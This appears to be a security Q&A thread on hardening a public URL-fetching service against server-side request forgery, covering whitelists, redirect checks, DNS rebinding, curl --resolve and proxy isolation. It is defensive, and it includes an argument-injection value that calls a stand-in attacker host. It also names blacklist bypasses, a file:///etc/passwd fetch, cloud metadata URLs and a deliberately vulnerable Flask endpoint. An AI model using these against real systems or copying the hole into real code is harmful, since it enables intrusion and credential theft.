
This is a follow-up to another topic (Is allowing unfiltered curl request from a website a vulnerability?) on which I am doing some private research.

Given:

A publicly reachable web service that accepts any URL and performs a curl GET request on it. The service operates without authentication.

The linked topic already states that unfiltered access is a security issue. But something about this topic keeps resurfacing in my thoughts, and it took me a while to pin it down: can such a service be made sufficiently secure against SSRF and similar attacks?


Obvious steps:

  • cURL is mighty, so restrict allowed schemes to http(s) and ftp (this removes the file, gopher, dict, etc. issues)
  • prevent access to the entire loopback range: localhost and 127.0.0.0/8, i.e. 127.0.0.0-127.255.255.255 (I was totally unaware that the entire 127.x.x.x network points to your own machine 0_o)
  • prevent access to 0.0.0.0
  • disallow the broadcast IP 255.255.255.255 (although it is unlikely that anything serves the allowed schemes above there)
  • prevent private IPs to avoid access to internal networks (impersonation of a server that is part of the private network?) -> 10.0.0.0/8, 172.16.0.0/12 and 192.168.0.0/16 (thanks wiki); a validation sketch follows this list
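A rough sketch of how I imagine these first checks could be implemented (Python standard library only; the function name and the exact set of blocked ranges are just illustrative, not prescribed anywhere):

import ipaddress
import socket
from urllib.parse import urlparse

ALLOWED_SCHEMES = {"http", "https", "ftp"}

def is_url_allowed(url):
    parts = urlparse(url)
    if parts.scheme not in ALLOWED_SCHEMES or not parts.hostname:
        return False
    try:
        # getaddrinfo returns both A and AAAA results (IPv4 and IPv6)
        infos = socket.getaddrinfo(parts.hostname, None)
    except socket.gaierror:
        return False  # unresolvable -> deny
    for info in infos:
        ip = ipaddress.ip_address(info[4][0].split("%")[0])  # strip any IPv6 zone id
        if (ip.is_loopback or ip.is_private or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified):
            return False
    return True

Note that this still resolves DNS separately from the actual fetch, which matters for the DNS question further down.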

But there is more, right?

  • if cURL is configured to follow redirects, the redirect must be validated the same way as the original IP, since forging a redirect is trivial
  • IPv6: Everything for the nice old IPv4 address space must be redone there too, right?
  • Are there some ports to filter by? Remember that schemes are restricted to http(s) and ftp. The service may still technically be usable as a port scanner, but that is not necessarily malicious, and fetching a website from port 675 might be OK.
  • Prevent DoS of remote URLs: implement some sort of token (akin to a CSRF token), introduce delays between multiple requests, say 1 second, or ban IPs which keep hammering. (This of course does not solve DDoS, but preventing DDoS is probably outside the scope here.)

One last thing I cannot fully get my head around:

What about DNS? Is it possible to register a DNS entry that points to localhost or to private networks?

On my machine I technically can perform a GET of http://my.box and get my router. Now how can somebody mitigate that risk?

Is performing an nslookup a solution? If I get an IP, validate the IP; if not, it could be anything, so deny. I keep forgetting what my NAS does so that I can reach it via host name on my local network, but being paranoid is probably a good approach here.

Samuel

5 Answers


SSRF can only be mitigated with a (regularly updated) whitelist of hosts or URLs which are known to be safe, i.e. which don't have any side effects that depend on the source IP, and where access to a URL will not cause an abuse report, lawsuit or similar against your site (for example because someone tries to find hidden pages on a site or to make bomb threats).

A blacklist will help but is not sufficient.
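As a minimal illustration of the whitelist approach (the host list here is purely a placeholder; keeping it current is the hard part):

from urllib.parse import urlparse

KNOWN_SAFE_HOSTS = {"example.com", "www.example.com"}  # placeholder list, reviewed regularly

def is_whitelisted(url):
    parts = urlparse(url)
    return (parts.scheme in ("http", "https")
            and parts.hostname in KNOWN_SAFE_HOSTS)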

Steffen Ullrich

To add to what Steffen said, and to provide some examples: you want to use a whitelist if at all possible. Blacklisting, like what you are proposing, can be bypassed.

For example:

http://2915201827/ - This is a valid website. Do you know which website it is?
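That URL uses the plain decimal (dword) form of an IPv4 address, which a naive string blacklist will not catch. Decoding it is a one-liner (Python standard library):

import ipaddress

# ipaddress accepts the raw 32-bit integer form of an IPv4 address
print(ipaddress.ip_address(2915201827))  # -> 173.194.115.35

This is one more reason to validate the resolved address rather than the URL string itself.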

Also, the tool as described is a proxy. Without throttling, someone could use it to attack another application, and your site would be the one with the bullseye on it from law enforcement. US courts have not been very kind to the "but it was open wifi, anybody could have done it" excuse, so there is precedent for this.

You need to be very careful with how you invoke cURL, and ideally, use a library instead of the command line tool. For example:

Runtime.getRuntime().exec("curl " + url);

in Java wouldn't allow a user to enter this: ; ls blah/, but it would allow a user to enter this:

-o /tmp/asdf http://attacker.example.com/hahaipwn.txt (which makes curl write the attacker's file to /tmp/asdf).
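The same class of problem is easy to reproduce in other languages. A hypothetical sketch in Python (the function names are mine) showing the unsafe pattern next to a safer one:

import shlex
import subprocess

def fetch_unsafe(url):
    # Mirrors the Java example: the string is split on whitespace, so a
    # "url" of "-o /tmp/asdf http://attacker.example.com/hahaipwn.txt"
    # silently injects extra curl options.
    subprocess.run(shlex.split("curl " + url), check=False)

def fetch_safer(url):
    # Rejecting anything that is not an absolute http(s) URL means the value
    # can never start with "-" and be mistaken for an option, and passing an
    # argument list avoids any shell or whitespace splitting.
    if not url.startswith(("http://", "https://")):
        raise ValueError("refusing non-http(s) URL")
    subprocess.run(["curl", "--max-time", "10", url], check=False)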

Final words:

There's a lot to consider with such a service.

h4ckNinja
  • My bad, the scenario I modelled wouldn't execute curl via a system call but use a PHP extension, so injecting anything besides the URL should be a non-issue. But thanks for the hint. The URL you mentioned is of course opaque to the curl request, but if it is not a private IP it should be a website like any other. It is not as if the curl result were executed on the server, which would of course cause even more issues. – Samuel Feb 18 '16 at 10:03

if cURL is configured to follow redirects, the redirect must be validated the same way as the original IP, since forging a redirect is trivial

Yes. You'd be best off not letting curl follow redirects and instead manually checking the Location header when a redirect is encountered.
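A sketch of that manual handling with the Python requests library (validate_url stands in for whatever SSRF checks you already apply to the original URL, and the redirect limit is arbitrary):

from urllib.parse import urljoin
import requests

MAX_REDIRECTS = 5

def fetch_with_checked_redirects(url):
    for _ in range(MAX_REDIRECTS):
        if not validate_url(url):  # assumed helper: same checks as for the first URL
            raise ValueError("blocked URL: " + url)
        resp = requests.get(url, allow_redirects=False, timeout=10)
        if resp.is_redirect or resp.is_permanent_redirect:
            # Location may be relative, so resolve it against the current URL,
            # then loop so the new target is validated exactly like the original
            url = urljoin(url, resp.headers["Location"])
            continue
        return resp
    raise ValueError("too many redirects")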

IPv6: Everything for the nice old IPv4 address space must be redone there too, right?

Yes, if you're supporting IPv6.

Are there some ports to filter by? Remember that schemes are restricted to http(s) and ftp. The service may still technically be usable as a port scanner, but that is not necessarily malicious, and fetching a website from port 675 might be OK.

Prevent DoS of remote URLs: implement some sort of token (akin to a CSRF token), introduce delays between multiple requests, say 1 second, or ban IPs which keep hammering. (This of course does not solve DDoS, but preventing DDoS is probably outside the scope here.)

Depends on the functionality you're trying to support. You could detect multiple attempts either from the same IP or to the same IP and then rate limit them, possibly showing a CAPTCHA after a while.
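A very small in-memory sliding-window limiter as an illustration (per client IP; the numbers are arbitrary, and in practice this would more likely live in Redis or in the reverse proxy):

import time
from collections import defaultdict, deque

WINDOW_SECONDS = 60
MAX_REQUESTS_PER_WINDOW = 10
recent_requests = defaultdict(deque)  # client IP -> timestamps of recent requests

def allow_request(client_ip):
    now = time.monotonic()
    timestamps = recent_requests[client_ip]
    while timestamps and now - timestamps[0] > WINDOW_SECONDS:
        timestamps.popleft()  # drop entries that fell out of the window
    if len(timestamps) >= MAX_REQUESTS_PER_WINDOW:
        return False  # over the limit: reject, or show a CAPTCHA
    timestamps.append(now)
    return True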

One last thing I cannot fully get my head around:

What about DNS? Is it possible to register a DNS entry that points to localhost or to private networks?

Yes. It is perfectly possible to point an A record at a private address. Furthermore it is possible to point an unrelated domain at a private address and then point a CNAME at that domain, causing this, in effect, to resolve to the private address.

On my machine I technically can perform a GET of http://my.box and get my router. Now how can somebody mitigate that risk?

You should isolate the machine serving the requests in its own subnet, which only has access to an internet gateway configured to route traffic out onto the public internet and nowhere else.

Is performing an nslookup a solution? If I get an IP, validate the IP; if not, it could be anything, so deny. I keep forgetting what my NAS does so that I can reach it via host name on my local network, but being paranoid is probably a good approach here.

Yes, as long as you explicitly make curl connect to that validated IP.

You need the lookup and the curl request to be unified. Otherwise an attacker could set a very low TTL (Time To Live) and update the DNS record between your validation and the moment curl performs its own lookup to fetch the URL (essentially DNS rebinding). You would otherwise also run into problems with cached entries.

For example, the --resolve curl parameter allows you to supply the address for a hostname and port pair yourself, so you can connect to the previously resolved, validated IP while curl behaves as if you had told it the full hostname. From the man page:

--resolve Provide a custom address for a specific host and port pair. Using this, you can make the curl requests(s) use a specified address and prevent the otherwise normally resolved address to be used. Consider it a sort of /etc/hosts alternative provided on the command line. The port number should be the number used for the specific protocol the host will be used for. It means you need several entries if you want to provide address for the same host but different ports.

This option can be used many times to add many host names to resolve.

(Added in 7.21.3)

e.g. curl --resolve www.example.com:443:203.0.113.24 https://www.example.com/
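If the service talks to libcurl through a language binding rather than the command-line tool, the same pinning is available as CURLOPT_RESOLVE. A sketch with pycurl, reusing the man page's example host and address and assuming a libcurl new enough to support it (7.21.3+); the validation of 203.0.113.24 is assumed to have happened already:

from io import BytesIO
import pycurl

buf = BytesIO()
c = pycurl.Curl()
c.setopt(pycurl.URL, "https://www.example.com/")
# Pin www.example.com:443 to the already-validated address, so a second,
# different DNS answer cannot redirect the actual fetch.
c.setopt(pycurl.RESOLVE, ["www.example.com:443:203.0.113.24"])
c.setopt(pycurl.FOLLOWLOCATION, False)  # handle redirects manually, as above
c.setopt(pycurl.WRITEDATA, buf)
c.setopt(pycurl.TIMEOUT, 10)
c.perform()
c.close()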

Of course, none of the above prevents abuse reports from being filed against you by target hosts. For example, there is always the risk that someone uses your service as a proxy in order to exploit another server (e.g. via SQL injection). Audit logs are not infallible, but you should create and retain full logs of all use of your service.

SilverlightFox
  • Thanks for the detailed reply. Sounds technically difficult to make this waterproof. What would I keep audit logs for? I would expect that an attacker would proxy their access to such a service anyway. Or do the audit logs serve a different purpose? – Samuel Feb 18 '16 at 12:13
  • They probably would proxy to your service, however at least you are doing your part and are recording what has happened. Additionally, it allows you to investigate should anyone try circumventing the controls to prevent SSRF that you have in place. – SilverlightFox Feb 18 '16 at 13:56
  • Now I wonder whether having terms of service disallowing such behaviour and full audit logs is able to protect you in any way from the "liability of disturbance" or "breach of duty of care", or whatever it is called in English. – Samuel Feb 18 '16 at 14:29

"Server-side request forgery (also known as SSRF) is a web security vulnerability that allows an attacker to induce the server-side application to make HTTP requests to an arbitrary domain of the attacker's choosing." https://portswigger.net/web-security/ssrf

This is an example of an app which is vulnerable to SSRF:

from flask import Flask, request
import requests

app = Flask(__name__)

@app.route('/')
def hello():
    # fetches whatever URL the client supplies -- this is the SSRF hole
    url = request.args['url']
    return requests.get(url).text

It takes the parameter "url" and makes an HTTP request to the user-entered URL. The impact of this vulnerability depends on the environment. For example, if this web app had an Elasticsearch instance installed next to it, an attacker could run some damaging commands against it; and if the app used a fetch client that can read files from the local filesystem, e.g. a file:///etc/passwd fetch, that takes the vulnerability to another level of severity!

To understand the impact you can dig into some SSRF reports on HackerOne: https://www.google.com/search?q=site%3Ahackerone.com+ssrf

As a developer you need to make the internal network unreachable for user-supplied requests. Some people advise you to build a blacklist of hosts to which requests are disallowed, but I would discourage you from blacklisting, because:

  • there are so many ways to bypass such a crude thing as a blacklist! For example, there are plenty of WAFs out in the wild, but humans can bypass them with various tricks. For SSRF there are likewise many tricks to bypass a blacklist, many of which are collected here: https://twitter.com/search?q=ssrf I like this one http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ lol :)
  • Also, it is not good practice to solve the problem by just "sealing" a security hole! If you have a security hole you should step back, think, and change your design!

So in my opinion the right solution for this is using a proxy! Please note I'm talking about a local proxy instance, used to prevent internal requests and allow only external ones, not to prevent IP leaking (note that IP leaking is also a problem, which you can address by buying a proxy list or building your own proxy network that is not a single point of failure that can be DDoSed at L3/L4)!

There are many ways to set up your own Squid proxy instance, but please note that your HTTP proxy must be accessible only to your application, not to the internet :) So lock it down with iptables so that only your own network infrastructure can use it.

So in short, you need to disallow the local network in your Squid HTTP proxy's configuration and make your app send its HTTP requests through it!

proxies = {
    'http': 'http://my_local_squid_instance:3128',
    # route https through the proxy too, otherwise https URLs bypass it
    'https': 'http://my_local_squid_instance:3128',
}
requests.get(url, proxies=proxies, timeout=10).text

(I also recommend using queues or coroutines for things like fetching, because we do not know how quickly, if at all, the external server will respond :) (so you should add a timeout for external requests, also to prevent DoS))

P.S. I was also building a pet project that had user-supplied URL fetching functionality, and I wanted to understand how to fix this properly! Some people wonder why I recommend the Squid proxy. The answer is that I know a big real-world app that uses it: VK.com uses a Squid proxy to fetch external data. You can verify this yourself using https://webhook.site; you will see that the User-Agent is the Squid proxy :)

  • Why squid? Any proxy would do. However, simply to fake your IP, maybe tor is more feasible. But afaik this question has the focus on the defensive side. – peterh Apr 13 '19 at 15:03
  • You did not understand. The Squid proxy is not there to change your IP! The Squid proxy is there to block any internal network requests! I mean that via requests.get(unsafeURL) a user can put any internal URL into unsafeURL and it will be fetched! But if we have a Squid proxy, via requests.get(unsafeURL, proxies=squid_proxy) it cannot be fetched, because the Squid proxy does not allow internal requests at the NETWORK level! Or at least you can configure the Squid proxy to make ONLY EXTERNAL requests! – Marat Mkhitaryan Sep 11 '19 at 13:11
  • (Note: I did not vote on your post.) Possibly we really did not understand. I suggest elaborating your answer, so you might also collect upvotes. The important thing is: you need to formulate your answer so that most voters understand it. And, honestly, many of them are smart. It's just that your answer is too short. – peterh Sep 11 '19 at 13:22
  • I have done some changes, check them out :) – Marat Mkhitaryan Sep 11 '19 at 14:10

I agree with Steffen Ullrich's answer - blacklisting leaves too many holes, and it will only be a matter of time until you encounter an unexpected "Gotcha". This is true in general for security, as proper defense in depth should start from the perspective of least privilege. Rather than asking "What shouldn't the user do?" it's much safer to ask "What should the user do?" and stop everything else.

I'll add to your list though as there is another very dangerous avenue that you would need to watch out for if you are blacklisting, and this example should help bring home the importance of white-listing.

Metadata Endpoints in Cloud Hosting Environments

Something relatively new in cloud hosting environments is metadata URLs, designed to aid in CI/CD and related infrastructure maintenance. These are internal-only API endpoints that give VPSes and other kinds of computing resources information about themselves, including the access keys that were used to launch them.

These endpoints are quite extensive, and they are an ideal target for attackers who find an SSRF vulnerability. Moreover, none of the rules you mentioned in your post would block access to them. Some brief details (a quick check against the question's blacklist follows this list):

  1. For Google Cloud the Metadata URL lives at http://metadata.google.internal/computeMetadata/v1/project/. Docs are here.
  2. For AWS the Metadata URL lives at http://169.254.169.254/latest/meta-data/. Docs are here.
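As a small Python illustration of that claim, the AWS metadata address is link-local and sits in none of the three RFC 1918 ranges listed in the question:

import ipaddress

ip = ipaddress.ip_address("169.254.169.254")
print(ip.is_link_local)  # True: 169.254.0.0/16, not an RFC 1918 range
for net in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16"):
    print(net, ip in ipaddress.ip_network(net))  # all False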

To make it clear that these things are quite dangerous:

  1. Here is a bug report that goes into abusing a metadata endpoint in detail
  2. And here is a very short summary of a bug report on hackerone where Shopify paid out $25,000 as a result of an SSRF vulnerability that gave access to the metadata endpoint on AWS, leading quickly to full root privileges for the attacker.

Summary

The takeaway here isn't just that metadata endpoints are dangerous (they are, and if you are hosting in a cloud environment then you need to know about them). Rather, the point is that blacklisting is not a very effective strategy. These metadata endpoints aren't blocked by any of the rules in your original post, but they are very dangerous, and they vary from hosting provider to hosting provider. That means you may have what seems to be a completely effective blacklist, but doing something as innocuous as switching hosting providers may end up making you completely vulnerable once again.

In short, the list of "dangerous" things you need to block can be endless. The list of actual things your application needs to do is probably much shorter. Unless you have a very compelling reason, it's much easier to focus on the list of things you are supposed to do, instead of the infinite list of things you shouldn't do.

Conor Mancone